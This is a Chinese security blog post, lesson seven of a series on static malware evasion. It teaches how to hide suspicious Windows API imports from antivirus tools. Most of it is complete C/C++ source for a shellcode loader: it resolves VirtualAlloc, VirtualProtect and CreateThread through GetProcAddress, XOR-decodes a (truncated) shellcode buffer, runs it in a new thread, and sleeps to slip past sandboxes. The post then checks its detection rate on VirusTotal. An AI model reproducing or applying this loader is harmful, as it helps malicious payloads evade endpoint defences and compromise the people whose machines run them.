<!doctype html><html class="not-ready lg:text-base" style=--bg:#faf8f1 lang=zh-cn dir=ltr><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><title>静态恶意代码逃逸（第七课） - 倾旋的博客</title><meta name=theme-color><meta name=description content="代码将会上传至Github，方便读者下载研究 : https://github.com/Rvn0xsy/BadCode
0x01 导入地址表（IAT）

Import Address Table 由于导入函数就是被程序调用但其执行代码又不在程序中的函数，这些函数的代码位于一个或者多个DLL 中，当PE 文件被装入内存的时候，Windows 装载器才将DLL 装入，并将调用导入函数的指令和函数实际所处的地址联系起来(动态连接)，这操作就需要导入表完成.其中导入地址表就指示函数实际地址。 - 来源百度百科
如下图所示：

在PE结构中，存在一个导入表，导入表中声明了这个PE文件会载入哪些模块，同时每个模块的结构中又会指向模块中的一些函数名称。这样的组织关系是为了告诉操作系统这些函数的地址在哪里，方便修正调用地址。
站在反病毒的角度提出假想：既然所有的PE文件都有导入表，并且声明了一些模块，并且还能通过模块找到导入函数的名称，那么是否能够作为一个文件的风险值的评估方向？
方法论：
如果一个文件的文件大小在300KB以内，并且导入函数又有Virtual Alloc、CreateThread，且VirtualAlloc的最后一个参数是0x40，那么此文件是高危文件。
0x40被定义在winnt.h中：
#define PAGE_NOACCESS           0x01    
#define PAGE_READONLY           0x02    
#define PAGE_READWRITE          0x04    
#define PAGE_WRITECOPY          0x08    
#define PAGE_EXECUTE            0x10    
#define PAGE_EXECUTE_READ       0x20    
#define PAGE_EXECUTE_READWRITE  0x40    
#define PAGE_EXECUTE_WRITECOPY  0x80  
看一下第一课代码编译出来的PE导出表：

根据这个猜想，我们开始尝试在PE文件中抹去导入函数名称。
0x02 GetProcAddress获取函数地址
GetProcAddress这个API在Kernel32.dll中被导出，主要功能是从一个加载的模块中获取函数的地址。
函数声明如下：
FARPROC GetProcAddress(
  HMODULE hModule, // 模块句柄
  LPCSTR  lpProcName // 函数名称
);
FARPROC被定义在了minwindef.h中，声明如下：
#define WINAPI      __stdcall

typedef int (FAR WINAPI *FARPROC)();
跟进它的声明能够发现是一个函数指针，也就是说GetProcAddress返回的是我们要找的函数地址。"><meta name=author content="倾旋的博客"><link rel="preload stylesheet" as=style href=https://payloads.online/main.min.css><link rel=preload as=image href=https://payloads.online/theme.png><link rel=preload as=image href=/avatar.jpeg><script defer src=https://payloads.online/highlight.min.js onload=hljs.initHighlightingOnLoad()></script><link rel=icon href=https://payloads.online/favicon.ico><link rel=apple-touch-icon href=https://payloads.online/apple-touch-icon.png><meta name=generator content="Hugo 0.148.2"><meta itemprop=name content="静态恶意代码逃逸（第七课）"><meta itemprop=description content="本节课，我们需要引入导入表的概念，并且通过代码的小技巧来隐藏导入表，减少文件特征"><meta itemprop=datePublished content="2020-10-23T00:00:00+00:00"><meta itemprop=dateModified content="2020-10-23T00:00:00+00:00"><meta itemprop=wordCount content="367"><meta property="og:url" content="https://payloads.online/archivers/2020-10-23/1/"><meta property="og:site_name" content="倾旋的博客"><meta property="og:title" content="静态恶意代码逃逸（第七课）"><meta property="og:description" content="本节课，我们需要引入导入表的概念，并且通过代码的小技巧来隐藏导入表，减少文件特征"><meta property="og:locale" content="zh_cn"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2020-10-23T00:00:00+00:00"><meta property="article:modified_time" content="2020-10-23T00:00:00+00:00"><meta name=twitter:card content="summary"><meta name=twitter:title content="静态恶意代码逃逸（第七课）"><meta name=twitter:description content="本节课，我们需要引入导入表的概念，并且通过代码的小技巧来隐藏导入表，减少文件特征"><link rel=canonical href=https://payloads.online/archivers/2020-10-23/1/></head><body class="bg-(--bg) text-black antialiased duration-200 ease-out [-webkit-tap-highlight-color:transparent] dark:text-white"><header class="mx-auto flex h-[4.5rem] max-w-(--w) px-8 whitespace-nowrap lg:justify-center"><div class="relative z-50 flex items-center ltr:mr-auto rtl:ml-auto"><a class="-translate-y-[1px] text-2xl font-medium" href=https://payloads.online/>倾旋的博客</a><div class="btn-dark text-[0px] ltr:ml-4 rtl:mr-4 h-6 w-6 shrink-0 cursor-pointer [background:url(./theme.png)_left_center/_auto_theme('spacing.6')_no-repeat] [transition:_background-position_0.4s_steps(5)] dark:[background-position:right]" role=button aria-label=Dark></div></div><div class="btn-menu relative z-50 flex h-[4.5rem] w-[5rem] shrink-0 cursor-pointer flex-col items-center justify-center gap-2.5 lg:hidden ltr:-mr-8 rtl:-ml-8" role=button aria-label=Menu></div><script>const htmlClass=document.documentElement.classList;setTimeout(()=>{htmlClass.remove("not-ready")},10);const btnMenu=document.querySelector(".btn-menu");btnMenu.addEventListener("click",()=>{htmlClass.toggle("open")});const metaTheme=document.querySelector('meta[name="theme-color"]'),lightBg="#faf8f1".replace(/"/g,""),setDark=e=>{metaTheme.setAttribute("content",e?"#000":lightBg),htmlClass[e?"add":"remove"]("dark"),localStorage.setItem("dark",e)},darkScheme=window.matchMedia("(prefers-color-scheme: dark)");if(htmlClass.contains("dark"))setDark(!0);else{const e=localStorage.getItem("dark");setDark(e?e==="true":darkScheme.matches)}darkScheme.addEventListener("change",e=>{setDark(e.matches)});const btnDark=document.querySelector(".btn-dark");btnDark.addEventListener("click",()=>{setDark(localStorage.getItem("dark")!=="true")})</script><div class="nav-wrapper fixed inset-x-0 top-full z-40 flex h-full flex-col justify-center bg-(--bg) pb-16 duration-200 select-none lg:static lg:h-auto lg:flex-row lg:bg-transparent! lg:pb-0 lg:transition-none"><nav class="lg:ml-12 lg:flex lg:flex-row lg:items-center lg:space-x-10 rtl:space-x-reverse"><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/>首页</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/posts/>文章列表</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/tags>标签</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/projects>开源项目</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/about>关于我</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/links/>友情链接</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/message>留言</a><a class="block text-center text-xl leading-[5rem] lg:text-base lg:font-normal" href=/sponsor>赞助</a></nav></div></header><main class="prose prose-neutral dark:prose-invert relative mx-auto min-h-[calc(100vh-9rem)] max-w-(--w) px-8 pt-14 pb-16"><article><header class=mb-14><h1 class="my-0! pb-2.5">静态恶意代码逃逸（第七课）</h1><div class="text-xs antialiased opacity-60"><time>Oct 23, 2020</time><span class=mx-1>&#183;</span>
<span>倾旋</span></div></header><section><p>代码将会上传至Github，方便读者下载研究 : <a href=https://github.com/Rvn0xsy/BadCode>https://github.com/Rvn0xsy/BadCode</a></p><h2 id=0x01-导入地址表iat>0x01 导入地址表（IAT）</h2><blockquote><p>Import Address Table 由于导入函数就是被程序调用但其执行代码又不在程序中的函数，这些函数的代码位于一个或者多个DLL 中，当PE 文件被装入内存的时候，Windows 装载器才将DLL 装入，并将调用导入函数的指令和函数实际所处的地址联系起来(动态连接)，这操作就需要导入表完成.其中导入地址表就指示函数实际地址。 - 来源百度百科</p></blockquote><p>如下图所示：</p><p><img src=https://images.payloads.online/a20742d6-4f5f-11ec-857b-00d861bf4abb.png alt=2020-10-23-10-46-14></p><p>在PE结构中，存在一个导入表，导入表中声明了这个PE文件会载入哪些模块，同时每个模块的结构中又会指向模块中的一些函数名称。这样的组织关系是为了告诉操作系统这些函数的地址在哪里，方便修正调用地址。</p><p>站在反病毒的角度提出假想：既然所有的PE文件都有导入表，并且声明了一些模块，并且还能通过模块找到导入函数的名称，那么是否能够作为一个文件的风险值的评估方向？</p><p>方法论：</p><p>如果一个文件的文件大小在300KB以内，并且导入函数又有<code>Virtual Alloc</code>、<code>CreateThread</code>，且<code>VirtualAlloc</code>的最后一个参数是<code>0x40</code>，那么此文件是高危文件。</p><p><code>0x40</code>被定义在<code>winnt.h</code>中：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#75715e>#define PAGE_NOACCESS           0x01    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_READONLY           0x02    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_READWRITE          0x04    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_WRITECOPY          0x08    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_EXECUTE            0x10    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_EXECUTE_READ       0x20    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_EXECUTE_READWRITE  0x40    
</span></span></span><span style=display:flex><span><span style=color:#75715e>#define PAGE_EXECUTE_WRITECOPY  0x80  
</span></span></span></code></pre></div><p>看一下<a href=https://github.com/Rvn0xsy/BadCode/blob/master/BadCode/Source.cpp>第一课代码</a>编译出来的PE导出表：</p><p><img src=https://images.payloads.online/a260fd58-4f5f-11ec-aadf-00d861bf4abb.png alt=2020-10-23-11-13-58></p><p>根据这个猜想，我们开始尝试在PE文件中抹去导入函数名称。</p><h2 id=0x02-getprocaddress获取函数地址>0x02 GetProcAddress获取函数地址</h2><p><code>GetProcAddress</code>这个API在Kernel32.dll中被导出，主要功能是从一个加载的模块中获取函数的地址。</p><p>函数声明如下：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c++ data-lang=c++><span style=display:flex><span>FARPROC <span style=color:#a6e22e>GetProcAddress</span>(
</span></span><span style=display:flex><span>  HMODULE hModule, <span style=color:#75715e>// 模块句柄
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>  LPCSTR  lpProcName <span style=color:#75715e>// 函数名称
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>);
</span></span></code></pre></div><p><code>FARPROC</code>被定义在了<code>minwindef.h</code>中，声明如下：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#75715e>#define WINAPI      __stdcall
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>int</span> (FAR WINAPI <span style=color:#f92672>*</span>FARPROC)();
</span></span></code></pre></div><p>跟进它的声明能够发现是一个函数指针，也就是说<code>GetProcAddress</code>返回的是我们要找的函数地址。</p><h2 id=0x03-自己动手获取函数地址>0x03 自己动手获取函数地址</h2><p>我们拿<a href=https://github.com/Rvn0xsy/BadCode/tree/master/BadCode>第一课的代码</a>来尝试修改。</p><p>分析<a href=https://github.com/Rvn0xsy/BadCode/blob/master/BadCode/Source.cpp>第一课的代码</a>，主要流程：</p><pre tabindex=0><code>VirtualAlloc -&gt; VirtualProtect -&gt; CreateThread -&gt; WaitForSingleObject
</code></pre><p>这几个函数是比较明显的，并且都在<code>kernel32.dll</code>中导出，我们尝试自己定义他们的函数指针，然后利用<code>GetProcAddress</code>获取函数地址，调用自己的函数名称。</p><p>新建一个<code>C/C++</code>项目，定义如下：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c++ data-lang=c++><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>LPVOID</span>(WINAPI<span style=color:#f92672>*</span> ImportVirtualAlloc)(
</span></span><span style=display:flex><span>	LPVOID lpAddress,
</span></span><span style=display:flex><span>	SIZE_T dwSize,
</span></span><span style=display:flex><span>	DWORD  flAllocationType,
</span></span><span style=display:flex><span>	DWORD  flProtect
</span></span><span style=display:flex><span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>HANDLE</span>(WINAPI<span style=color:#f92672>*</span> ImportCreateThread)(
</span></span><span style=display:flex><span>	LPSECURITY_ATTRIBUTES   lpThreadAttributes,
</span></span><span style=display:flex><span>	SIZE_T                  dwStackSize,
</span></span><span style=display:flex><span>	LPTHREAD_START_ROUTINE  lpStartAddress,
</span></span><span style=display:flex><span>	__drv_aliasesMem LPVOID lpParameter,
</span></span><span style=display:flex><span>	DWORD                   dwCreationFlags,
</span></span><span style=display:flex><span>	LPDWORD                 lpThreadId);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>BOOL</span>(WINAPI<span style=color:#f92672>*</span> ImportVirtualProtect)(
</span></span><span style=display:flex><span>	LPVOID lpAddress,
</span></span><span style=display:flex><span>	SIZE_T dwSize,
</span></span><span style=display:flex><span>	DWORD  flNewProtect,
</span></span><span style=display:flex><span>	PDWORD lpflOldProtect
</span></span><span style=display:flex><span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>DWORD</span> (WINAPI <span style=color:#f92672>*</span> ImportWaitForSingleObject)(
</span></span><span style=display:flex><span>  HANDLE hHandle,
</span></span><span style=display:flex><span>  DWORD  dwMilliseconds
</span></span><span style=display:flex><span>);
</span></span></code></pre></div><p>然后在<code>main</code>函数中，定义四个函数指针来存放这些函数的地址。</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c++ data-lang=c++><span style=display:flex><span>	ImportVirtualAlloc MyVirtualAlloc <span style=color:#f92672>=</span> (ImportVirtualAlloc)GetProcAddress(GetModuleHandle(TEXT(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;VirtualAlloc&#34;</span>);
</span></span><span style=display:flex><span>	ImportCreateThread MyCreateThread <span style=color:#f92672>=</span> (ImportCreateThread)GetProcAddress(GetModuleHandle(TEXT(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;CreateThread&#34;</span>);
</span></span><span style=display:flex><span>	ImportVirtualProtect MyVirtualProtect <span style=color:#f92672>=</span> (ImportVirtualProtect)GetProcAddress(GetModuleHandle(TEXT(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;VirtualProtect&#34;</span>);
</span></span><span style=display:flex><span>	ImportWaitForSingleObject MyWaitForSingleObject <span style=color:#f92672>=</span> (ImportWaitForSingleObject)GetProcAddress(GetModuleHandle(TEXT(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;WaitForSingleObject&#34;</span>);
</span></span></code></pre></div><p>完整代码如下：</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-c data-lang=c><span style=display:flex><span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;Windows.h&gt;</span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;intrin.h&gt;</span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;WinBase.h&gt;</span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e>#include</span> <span style=color:#75715e>&lt;stdio.h&gt;</span><span style=color:#75715e>
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>LPVOID</span>(WINAPI<span style=color:#f92672>*</span> ImportVirtualAlloc)(
</span></span><span style=display:flex><span>	LPVOID lpAddress,
</span></span><span style=display:flex><span>	SIZE_T dwSize,
</span></span><span style=display:flex><span>	DWORD  flAllocationType,
</span></span><span style=display:flex><span>	DWORD  flProtect
</span></span><span style=display:flex><span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>HANDLE</span>(WINAPI<span style=color:#f92672>*</span> ImportCreateThread)(
</span></span><span style=display:flex><span>	LPSECURITY_ATTRIBUTES   lpThreadAttributes,
</span></span><span style=display:flex><span>	SIZE_T                  dwStackSize,
</span></span><span style=display:flex><span>	LPTHREAD_START_ROUTINE  lpStartAddress,
</span></span><span style=display:flex><span>	__drv_aliasesMem LPVOID lpParameter,
</span></span><span style=display:flex><span>	DWORD                   dwCreationFlags,
</span></span><span style=display:flex><span>	LPDWORD                 lpThreadId);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>BOOL</span>(WINAPI<span style=color:#f92672>*</span> ImportVirtualProtect)(
</span></span><span style=display:flex><span>	LPVOID lpAddress,
</span></span><span style=display:flex><span>	SIZE_T dwSize,
</span></span><span style=display:flex><span>	DWORD  flNewProtect,
</span></span><span style=display:flex><span>	PDWORD lpflOldProtect
</span></span><span style=display:flex><span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>typedef</span> <span style=color:#a6e22e>DWORD</span>(WINAPI<span style=color:#f92672>*</span> ImportWaitForSingleObject)(
</span></span><span style=display:flex><span>	HANDLE hHandle,
</span></span><span style=display:flex><span>	DWORD  dwMilliseconds
</span></span><span style=display:flex><span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e>// 入口函数
</span></span></span><span style=display:flex><span><span style=color:#75715e></span><span style=color:#66d9ef>int</span> <span style=color:#a6e22e>wmain</span>(<span style=color:#66d9ef>int</span> argc, TCHAR<span style=color:#f92672>*</span> argv[]) {
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	ImportVirtualAlloc MyVirtualAlloc <span style=color:#f92672>=</span> (ImportVirtualAlloc)<span style=color:#a6e22e>GetProcAddress</span>(<span style=color:#a6e22e>GetModuleHandle</span>(<span style=color:#a6e22e>TEXT</span>(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;VirtualAlloc&#34;</span>);
</span></span><span style=display:flex><span>	ImportCreateThread MyCreateThread <span style=color:#f92672>=</span> (ImportCreateThread)<span style=color:#a6e22e>GetProcAddress</span>(<span style=color:#a6e22e>GetModuleHandle</span>(<span style=color:#a6e22e>TEXT</span>(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;CreateThread&#34;</span>);
</span></span><span style=display:flex><span>	ImportVirtualProtect MyVirtualProtect <span style=color:#f92672>=</span> (ImportVirtualProtect)<span style=color:#a6e22e>GetProcAddress</span>(<span style=color:#a6e22e>GetModuleHandle</span>(<span style=color:#a6e22e>TEXT</span>(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;VirtualProtect&#34;</span>);
</span></span><span style=display:flex><span>	ImportWaitForSingleObject MyWaitForSingleObject <span style=color:#f92672>=</span> (ImportWaitForSingleObject)<span style=color:#a6e22e>GetProcAddress</span>(<span style=color:#a6e22e>GetModuleHandle</span>(<span style=color:#a6e22e>TEXT</span>(<span style=color:#e6db74>&#34;kernel32.dll&#34;</span>)), <span style=color:#e6db74>&#34;WaitForSingleObject&#34;</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#66d9ef>int</span> shellcode_size <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>; <span style=color:#75715e>// shellcode长度
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	DWORD dwThreadId; <span style=color:#75715e>// 线程ID
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	HANDLE hThread; <span style=color:#75715e>// 线程句柄
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	DWORD dwOldProtect; <span style=color:#75715e>// 内存页属性
</span></span></span><span style=display:flex><span><span style=color:#75715e></span><span style=color:#75715e>/* length: 800 bytes */</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#66d9ef>char</span> buf[] <span style=color:#f92672>=</span> <span style=color:#e6db74>&#34;</span><span style=color:#ae81ff>\xf6\xe2\x83\x0a\x0a\x0a\x6a</span><span style=color:#e6db74>...&#34;</span>;
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#75715e>// 获取shellcode大小
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	shellcode_size <span style=color:#f92672>=</span> <span style=color:#66d9ef>sizeof</span>(buf);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#75715e>/* 增加异或代码 */</span>
</span></span><span style=display:flex><span>	<span style=color:#66d9ef>for</span> (<span style=color:#66d9ef>int</span> i <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>; i <span style=color:#f92672>&lt;</span> shellcode_size; i<span style=color:#f92672>++</span>) {
</span></span><span style=display:flex><span>		<span style=color:#75715e>//Sleep(50);
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		<span style=color:#a6e22e>_InterlockedXor8</span>(buf <span style=color:#f92672>+</span> i, <span style=color:#ae81ff>10</span>);
</span></span><span style=display:flex><span>	}
</span></span><span style=display:flex><span>	
</span></span><span style=display:flex><span>	<span style=color:#75715e>/*
</span></span></span><span style=display:flex><span><span style=color:#75715e>	VirtualAlloc(
</span></span></span><span style=display:flex><span><span style=color:#75715e>		NULL, // 基址
</span></span></span><span style=display:flex><span><span style=color:#75715e>		800,  // 大小
</span></span></span><span style=display:flex><span><span style=color:#75715e>		MEM_COMMIT, // 内存页状态
</span></span></span><span style=display:flex><span><span style=color:#75715e>		PAGE_EXECUTE_READWRITE // 可读可写可执行
</span></span></span><span style=display:flex><span><span style=color:#75715e>		);
</span></span></span><span style=display:flex><span><span style=color:#75715e>	*/</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#66d9ef>char</span><span style=color:#f92672>*</span> shellcode <span style=color:#f92672>=</span> (<span style=color:#66d9ef>char</span><span style=color:#f92672>*</span>)<span style=color:#a6e22e>MyVirtualAlloc</span>(
</span></span><span style=display:flex><span>		NULL,
</span></span><span style=display:flex><span>		shellcode_size,
</span></span><span style=display:flex><span>		MEM_COMMIT,
</span></span><span style=display:flex><span>		PAGE_READWRITE <span style=color:#75715e>// 只申请可读可写
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#75715e>// 将shellcode复制到可读可写的内存页中
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	<span style=color:#a6e22e>CopyMemory</span>(shellcode, buf, shellcode_size);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#75715e>// 这里开始更改它的属性为可执行
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	<span style=color:#a6e22e>MyVirtualProtect</span>(shellcode, shellcode_size, PAGE_EXECUTE, <span style=color:#f92672>&amp;</span>dwOldProtect);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#75715e>// 等待几秒，兴许可以跳过某些沙盒呢？
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	<span style=color:#a6e22e>Sleep</span>(<span style=color:#ae81ff>2000</span>);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	hThread <span style=color:#f92672>=</span> <span style=color:#a6e22e>MyCreateThread</span>(
</span></span><span style=display:flex><span>		NULL, <span style=color:#75715e>// 安全描述符
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		NULL, <span style=color:#75715e>// 栈的大小
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		(LPTHREAD_START_ROUTINE)shellcode, <span style=color:#75715e>// 函数
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		NULL, <span style=color:#75715e>// 参数
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		NULL, <span style=color:#75715e>// 线程标志
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>		<span style=color:#f92672>&amp;</span>dwThreadId <span style=color:#75715e>// 线程ID
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	);
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>	<span style=color:#a6e22e>MyWaitForSingleObject</span>(hThread, INFINITE); <span style=color:#75715e>// 一直等待线程执行结束
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>	<span style=color:#66d9ef>return</span> <span style=color:#ae81ff>0</span>;
</span></span><span style=display:flex><span>}
</span></span></code></pre></div><p>编译后能够正常执行，并且我们查看一下导入表，我们自己定义的函数已经不在导入表中了：</p><p><img src=https://images.payloads.online/a2a0a3fe-4f5f-11ec-b0cc-00d861bf4abb.png alt=2020-10-23-11-26-45></p><p><a href=https://www.virustotal.com/gui/file/6e46cbe74a6d82747d2eb057d49b449477ab9c5e7bc6a7be295cbe7c09d5a7e4/detection>Virus Total</a>一下看看：</p><p><img src=https://images.payloads.online/a2d95ad2-4f5f-11ec-82d9-00d861bf4abb.png alt=2020-10-23-11-30-16></p><p>目前这个程序仅仅只是在一个函数中进行调用，并且还有字符串硬编码的问题，下一课着重分享如何解决字符串硬编码的问题。</p></section><nav class="mt-24 flex overflow-hidden rounded-xl bg-black/[3%] text-lg leading-[1.2]! *:flex *:w-1/2 *:items-center *:p-5 *:font-medium *:no-underline dark:bg-white/[8%] [&>*:hover]:bg-black/[2%] dark:[&>*:hover]:bg-white/[3%]"><a class="ltr:pr-3 rtl:pl-3" href=https://payloads.online/archivers/2020-11-01/1/><span class="ltr:mr-1.5 rtl:ml-1.5">←</span><span>Web正向代理的思考</span></a><a class="justify-end pl-3 ltr:ml-auto rtl:mr-auto" href=https://payloads.online/archivers/2020-08-24/1/><span>这是一个充满挑战的好时代</span><span class="ltr:ml-1.5 rtl:mr-1.5">→</span></a></nav><div class="giscus mt-24"></div><script src=https://giscus.app/client.js data-repo=Rvn0xsy/rvn0xsy.github.io data-repo-id="MDEwOlJlcG9zaXRvcnk0MDEyMzI3MTY=" data-category=General data-category-id=DIC_kwDOF-pTTM4CRDk_ data-mapping=title data-strict=1 data-reactions-enabled=0 data-emit-metadata=0 data-input-position=top data-theme=light data-lang=zh-CN data-loading=lazy crossorigin=anonymous async></script></article></main><footer class="mx-auto flex h-[4.5rem] max-w-(--w) items-center px-8 text-xs tracking-wider uppercase opacity-60"><div class=mr-auto>倾旋 All rights reserved</div><a class="link mx-6" href=https://gohugo.io/ rel=noopener target=_blank>powered by hugo️️</a>️</footer></body></html>